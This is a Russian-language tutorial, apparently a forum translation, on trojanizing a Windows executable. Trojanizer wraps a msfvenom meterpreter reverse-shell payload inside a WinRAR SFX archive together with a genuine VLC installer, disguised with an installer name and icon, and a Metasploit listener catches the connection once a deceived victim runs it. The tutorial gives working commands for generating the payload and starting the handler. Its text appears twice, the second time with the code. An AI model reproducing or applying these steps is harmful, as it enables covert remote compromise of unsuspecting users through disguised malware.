Инструмент Trojanizer использует WinRAR (SFX), чтоб сжать два файла между собой и преобразовать их в исполняемый архив SFX (.exe). SFX-архив при работе запускает оба файла (наш payload и легальное приложение одновременно).
Откуда скачать?
Далее создаем пейлоад, используя msfvenom
Запуск Trojanizer
Переходим в папку с Trojanizer и запускаем Trojanizer.sh файл. У Trojanizer есть зависимости, которые нужны для работы тулзы, он попробует их поставить сам, но в случае неудачи, установите следующие пакеты: Wine Program Files, WinRAR Software and Zenity.
После запуска откроется форма для сжатия. Здесь можно выбрать пейлоад, который мы создали, используя msfvenom, в самом начале.
После выбора пейлоада, откроется другое окно под названием Legit Application to Trojanize
Далее нужно выбрать любой исполняемый файл (.exe), который хотим связать с нашей нагрузкой. Я связываю VLC Player Installer File с моей нагрузкой.
После того, как вы нажмете ОК, необходимо будет задать новое имя для файла. Сохраните его как файл инсталлятор. Например, vlc-32bit-Installer или vlc-update64 или по вашему выбору.
Теперь необходимо выбрать иконку для нашего инсталлятора. Вы можете выбрать из списка по умолчанию или загрузить любой файл с иконкой в формате (.ico) из Google.
Как можно видеть из приведенного выше скрина, я добавил файл vlc-icon.ico как иконку.
После выбора файла иконки выпадает окно, сообщающее путь к новому файлу инсталлятору.
А теперь давайте поднимем Listener в Metasploit:
Отправляем вредоносную программу на машину жертвы любым удобным способом.
Когда пользователь откроет файл, он получит обычное предупреждение о безопасности, как показано ниже.
После того, как жертва нажмет RUN, у пользователя начнет работать VLC installer, и он ничего не заподозрит.
Но в тоже время, у нас будет meterpreter сессия, как показано ниже.
Именно так можно связать файл нашу нагрузку с любым файлом программного обеспечения (.exe) с использованием Trojanizer.
Автор: Sanjeet Kumar
Первоисточник: Bind Payload using SFX archive with Trojanizer
Автор перевода @SooLFaa. codeby
Откуда скачать?
Код:
git clone https://github.com/r00t-3xp10it/trojanizer.gitДалее создаем пейлоад, используя msfvenom
Код:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4466 -f exe > /root/Desktop/backdoor.exeЗапуск Trojanizer
Переходим в папку с Trojanizer и запускаем Trojanizer.sh файл. У Trojanizer есть зависимости, которые нужны для работы тулзы, он попробует их поставить сам, но в случае неудачи, установите следующие пакеты: Wine Program Files, WinRAR Software and Zenity.
После запуска откроется форма для сжатия. Здесь можно выбрать пейлоад, который мы создали, используя msfvenom, в самом начале.
После выбора пейлоада, откроется другое окно под названием Legit Application to Trojanize
Далее нужно выбрать любой исполняемый файл (.exe), который хотим связать с нашей нагрузкой. Я связываю VLC Player Installer File с моей нагрузкой.
После того, как вы нажмете ОК, необходимо будет задать новое имя для файла. Сохраните его как файл инсталлятор. Например, vlc-32bit-Installer или vlc-update64 или по вашему выбору.
Теперь необходимо выбрать иконку для нашего инсталлятора. Вы можете выбрать из списка по умолчанию или загрузить любой файл с иконкой в формате (.ico) из Google.
Как можно видеть из приведенного выше скрина, я добавил файл vlc-icon.ico как иконку.
После выбора файла иконки выпадает окно, сообщающее путь к новому файлу инсталлятору.
А теперь давайте поднимем Listener в Metasploit:
Код:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.111
msf exploit(multi/handler) > set lport 4466
msf exploit(multi/handler) > run -jОтправляем вредоносную программу на машину жертвы любым удобным способом.
Когда пользователь откроет файл, он получит обычное предупреждение о безопасности, как показано ниже.
После того, как жертва нажмет RUN, у пользователя начнет работать VLC installer, и он ничего не заподозрит.
Но в тоже время, у нас будет meterpreter сессия, как показано ниже.
Именно так можно связать файл нашу нагрузку с любым файлом программного обеспечения (.exe) с использованием Trojanizer.
Автор: Sanjeet Kumar
Первоисточник: Bind Payload using SFX archive with Trojanizer
Автор перевода @SooLFaa. codeby
